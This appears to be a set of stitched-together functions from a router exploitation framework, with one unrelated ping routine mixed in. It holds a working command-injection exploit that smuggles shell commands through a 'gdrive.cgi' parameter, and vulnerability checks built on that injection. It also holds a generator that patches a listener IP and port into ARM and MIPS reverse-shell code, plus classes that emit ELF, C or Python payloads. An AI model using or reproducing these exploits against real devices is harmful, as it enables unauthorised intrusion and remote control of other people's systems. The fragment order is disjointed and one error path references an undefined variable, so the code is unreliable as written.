def check(self, host, port, timeout): cmd = utils.random_text(6) resp = self.execute(host, port, timeout, cmd) if cmd in resp: self.print_check_result(True, host) return True else: self.print_check_result(False, host) return False
def check(self, host, port, timeout): cmd = 'echo {}'.format(utils.random_text(10)) response = self.execute(host, port, timeout, cmd) self.s.close() if response in cmd: self.print_check_result(True, host) return True # target is vulnerable self.print_check_result(False, host) return False
def run(self): """Pings a remote host and handles the responses.""" payload_provider = provider.Repeat(b'', 0) if self.sweep_start and self.sweep_end and self.sweep_end >= self.sweep_start: if not self.payload: self.payload = random_text(self.sweep_start) payload_provider = provider.Sweep(self.payload, self.sweep_start, self.sweep_end) elif self.size and self.size > 0: if not self.payload: self.payload = random_text(self.size) payload_provider = provider.Repeat(self.payload, self.count) # Set the Don't Fragment bit. if self.dont_fragment: self.options = network.SocketInterface.dont_fragment while True: seed_id = randint(0x1, 0xFFFF) if seed_id not in self.seed_identifiers.ids: self.seed_identifiers.ids.append(seed_id) break communicator = executor.Communicator(self.destination, payload_provider, self.timeout, socket_options=self.options, verbose=self.verbose, output=self.output, seed_id=seed_id) communicator.run(match_payloads=self.match) self.seed_identifiers.ids.remove(seed_id) return communicator.responses
def execute(self, host, port, timeout, cmd): mark = utils.random_text(32) url = "{}:{}/cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;{};echo {};".format( host, port, cmd, mark) response, err = self.http_get(self.s, url, timeout) if err: self.print_requests_err(host, err) return '' if mark in response.text: regexp = "(|.+?){}".format(mark) res = re.findall(regexp, response.text, re.DOTALL) if len(res): return res[0] return ""
def generate_binary(self, lhost, lport): print_warning("Generating reverse shell binary") self.binary_name = random_text(8) ip = self.convert_ip(lhost) port = self.convert_port(lport) if self.arch == 'arm': self.revshell = self.arm[:0x104] + ip + self.arm[ 0x108:0x10a] + port + self.arm[0x10c:] elif self.arch == 'mipsel': self.revshell = self.mipsel[:0xe4] + port + self.mipsel[ 0xe6:0xf0] + ip[2:] + self.mipsel[ 0xf2:0xf4] + ip[:2] + self.mipsel[0xf6:] elif self.arch == 'mips': self.revshell = self.mips[:0xea] + port + self.mips[ 0xec:0xf2] + ip[:2] + self.mips[0xf4:0xf6] + ip[ 2:] + self.mips[0xf8:] else: print_failed("Platform not supported")
def check(self, host, port, timeout): number = int(utils.random_text(6, alph=string.digits)) solution = number - 1 cmd = "echo $(({}-1))".format(number) url = "http://{}:{}/cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;{};echo ffffffffffffffff;".format( host, port, cmd) response, err = self.http_get(self.s, url, timeout) if err: self.print_requests_err(host, port, e) self.print_check_result(False, host) return False if response.status_code == 200 and str(solution) in response.text: self.print_check_result(True, host) return True # target is vulnerable self.print_check_result(False, host) return False
class ArchitectureSpecificPayload(BasePayload): architecture = None output = exploits.Option('python', 'Output type: elf/c/python') filepath = exploits.Option("/tmp/{}".format(random_text(8)), 'Output file to write') def __init__(self): super(ArchitectureSpecificPayload, self).__init__() if self.architecture not in Architectures: raise OptionValidationError( "Please use one of valid payload architectures: {}".format( Architectures._fields)) self.header = ARCH_ELF_HEADERS[self.architecture] self.bigendian = True if self.architecture.endswith("be") else False def run(self): print_status("Generating payload") try: data = self.generate() except OptionValidationError as e: print_error(e) return if self.output == "elf": with open(self.filepath, 'w+') as f: print_status("Building ELF payload") content = self.generate_elf(data) print_success("Saving file {}".format(self.filepath)) f.write(content) elif self.output == "c": print_success("Bulding payload for C") content = self.generate_c(data) print_info(content) elif self.output == "python": print_success("Building payload for python") content = self.generate_python(data) print_info(content) else: raise OptionValidationError("No such option as {}".format( self.output)) def generate_elf(self, data): elf = self.header + data if self.bigendian: p_filesz = pack(">L", len(elf)) p_memsz = pack(">L", len(elf) + len(data)) else: p_filesz = pack("<L", len(elf)) p_memsz = pack("<L", len(elf) + len(data)) content = elf[:0x44] + p_filesz + p_memsz + elf[0x4c:] return content @staticmethod def generate_c(data): res = "unsigned char sh[] = {\n \"" for idx, x in enumerate(data): if idx % 15 == 0 and idx != 0: res += "\"\n \"" res += "\\x%02x" % ord(x) res += "\"\n};" return res @staticmethod def generate_python(data): res = "payload = (\n \"" for idx, x in enumerate(data): if idx % 15 == 0 and idx != 0: res += "\"\n \"" res += "\\x%02x" % ord(x) res += "\"\n)" return res
class Payload(exploits.Exploit): output = exploits.Option('python', 'Output type: elf/python') filepath = exploits.Option("/tmp/{}".format(random_text(8)), 'Output file to write') def __init__(self): if self.architecture == "armle": self.bigendian = False self.header = ARCH_ELF_HEADERS['armle'] elif self.architecture == "mipsbe": self.bigendian = True self.header = ARCH_ELF_HEADERS['mipsbe'] elif self.architecture == "mipsle": self.bigendian = False self.header = ARCH_ELF_HEADERS['mipsle'] else: print_error( "Define architecture. Supported architectures: armle, mipsbe, mipsle" ) return None def run(self): print_status("Generating payload") self.generate() if self.output == "elf": with open(self.filepath, 'w+') as f: print_status("Building ELF payload") content = self.generate_elf() print_success("Saving file {}".format(self.filepath)) f.write(content) elif self.output == "python": print_success("Building payload for python") content = self.generate_python() print_info(content) def convert_ip(self, addr): res = "" for i in addr.split("."): res += chr(int(i)) return res def convert_port(self, p): res = "%.4x" % int(p) return res.decode('hex') def generate_elf(self): elf = self.header + self.payload if self.bigendian: p_filesz = pack(">L", len(elf)) p_memsz = pack(">L", len(elf) + len(self.payload)) else: p_filesz = pack("<L", len(elf)) p_memsz = pack("<L", len(elf) + len(self.payload)) content = elf[:0x44] + p_filesz + p_memsz + elf[0x4c:] return content def generate_python(self): res = "payload = (\n \"" for idx, x in enumerate(self.payload): if idx % 15 == 0 and idx != 0: res += "\"\n \"" res += "\\x%02x" % ord(x) res += "\"\n)" return res